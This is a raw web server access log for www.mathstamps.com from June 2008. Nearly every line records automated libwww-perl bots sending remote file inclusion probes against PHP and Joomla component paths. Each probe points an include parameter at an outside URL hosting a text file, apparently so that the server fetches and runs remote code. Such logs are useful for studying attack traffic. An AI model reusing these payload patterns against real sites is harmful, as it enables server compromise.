195.34.78.106 - - [29/Jun/2008:21:36:15 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:36:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:36:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:37:48 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:37:48 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:21:37:48 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:37:49 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:37:49 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.126.172.166 - - [29/Jun/2008:21:40:28 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.125.5.1 - - [29/Jun/2008:21:41:37 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:21:48:33 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:21:48:33 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:21:48:34 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:21:48:34 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:21:48:34 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:21:48:34 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:21:50:32 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:21:50:36 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
59.125.5.1 - - [29/Jun/2008:21:53:05 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:53:17 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.27.110.65 - - [29/Jun/2008:21:53:49 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [29/Jun/2008:21:53:49 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [29/Jun/2008:21:53:49 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.61.106.42 - - [29/Jun/2008:21:54:13 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.61.106.42 - - [29/Jun/2008:21:54:14 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
69.61.106.42 - - [29/Jun/2008:21:54:14 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
59.125.5.1 - - [29/Jun/2008:21:54:39 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:58:16 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:58:16 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.92.108.68 - - [29/Jun/2008:21:58:16 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.34.78.106 - - [29/Jun/2008:21:59:33 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.125.5.1 - - [29/Jun/2008:22:10:29 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
59.125.5.1 - - [29/Jun/2008:22:10:31 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:15:01 -0700] "GET /logs/access.log//component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:15:01 -0700] "GET //component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:15:02 -0700] "GET /logs//component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:16:16 -0700] "GET /logs/access_080526.log//component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.210.111.35 - - [29/Jun/2008:22:29:00 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.210.111.35 - - [29/Jun/2008:22:29:00 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.210.111.35 - - [29/Jun/2008:22:29:00 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.210.111.35 - - [29/Jun/2008:22:29:08 -0700] "GET /logs/access_080421.log//about.php?CONFIG[MWCHAT_Libs]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.210.111.35 - - [29/Jun/2008:22:29:08 -0700] "GET //about.php?CONFIG[MWCHAT_Libs]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.210.111.35 - - [29/Jun/2008:22:29:08 -0700] "GET /logs//about.php?CONFIG[MWCHAT_Libs]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:22:29:55 -0700] "GET /logs/access_080421.log//about.php?CONFIG[MWCHAT_Libs]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:22:29:55 -0700] "GET //about.php?CONFIG[MWCHAT_Libs]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:22:29:55 -0700] "GET /logs//about.php?CONFIG[MWCHAT_Libs]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:22:30:00 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:22:30:01 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:22:30:01 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.210.111.35 - - [29/Jun/2008:22:34:28 -0700] "GET /logs/access_080512.log//about.php?CONFIG[MWCHAT_Libs]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
200.76.111.11 - - [29/Jun/2008:22:35:54 -0700] "GET /logs/access_080512.log//about.php?CONFIG[MWCHAT_Libs]=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.63.2.169 - - [29/Jun/2008:22:39:10 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.63.2.169 - - [29/Jun/2008:22:39:10 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:40:05 -0700] "GET /logs/access_080609.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:40:06 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:40:06 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.221.173.145 - - [29/Jun/2008:22:41:17 -0700] "GET /logs/access_080421.log//about.php?CONFIG%5BMWCHAT_Libs%5D=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
195.221.173.145 - - [29/Jun/2008:22:41:17 -0700] "GET /logs/access_080421.log//about.php?CONFIG%5BMWCHAT_Libs%5D=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
195.221.173.145 - - [29/Jun/2008:22:41:18 -0700] "GET //about.php?CONFIG%5BMWCHAT_Libs%5D=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
195.221.173.145 - - [29/Jun/2008:22:41:18 -0700] "GET //about.php?CONFIG%5BMWCHAT_Libs%5D=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
195.221.173.145 - - [29/Jun/2008:22:41:18 -0700] "GET /logs//about.php?CONFIG%5BMWCHAT_Libs%5D=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
195.221.173.145 - - [29/Jun/2008:22:41:18 -0700] "GET /logs//about.php?CONFIG%5BMWCHAT_Libs%5D=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
216.75.35.118 - - [29/Jun/2008:22:42:59 -0700] "GET /!scanhttp://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.221.173.145 - - [29/Jun/2008:22:44:33 -0700] "GET /logs/access_080310.log//about.php?CONFIG%5BMWCHAT_Libs%5D=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
195.221.173.145 - - [29/Jun/2008:22:44:34 -0700] "GET /logs/access_080310.log//about.php?CONFIG%5BMWCHAT_Libs%5D=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
216.75.35.118 - - [29/Jun/2008:22:46:15 -0700] "GET /logs/access_080317.log/!scanhttp://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [29/Jun/2008:22:46:15 -0700] "GET /logs/!scanhttp://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:52:29 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:52:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:52:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:06 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:07 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:08 -0700] "GET /logs/access_080609.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:09 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:09 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:20 -0700] "GET /logs/access_080505.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:22 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:23 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:29 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:36 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:36 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:36 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:43 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:51 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:22:55:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:01:43 -0700] "GET /logs/access_080512.log//index.php?option=com_custompages&cpage=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:01:44 -0700] "GET //index.php?option=com_custompages&cpage=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:01:44 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:03:24 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:05:08 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:05:09 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:05:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.8.118 - - [29/Jun/2008:23:05:30 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:08:17 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:08:19 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.220.139.98 - - [29/Jun/2008:23:08:20 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:10:37 -0700] "GET //components/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:11:25 -0700] "GET /logs/access_080609.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:11:26 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:11:26 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:11:38 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:12:59 -0700] "GET /logs/access.log//components/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:12:59 -0700] "GET /logs//components/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:13:19 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:13:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.27.47 - - [29/Jun/2008:23:13:21 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
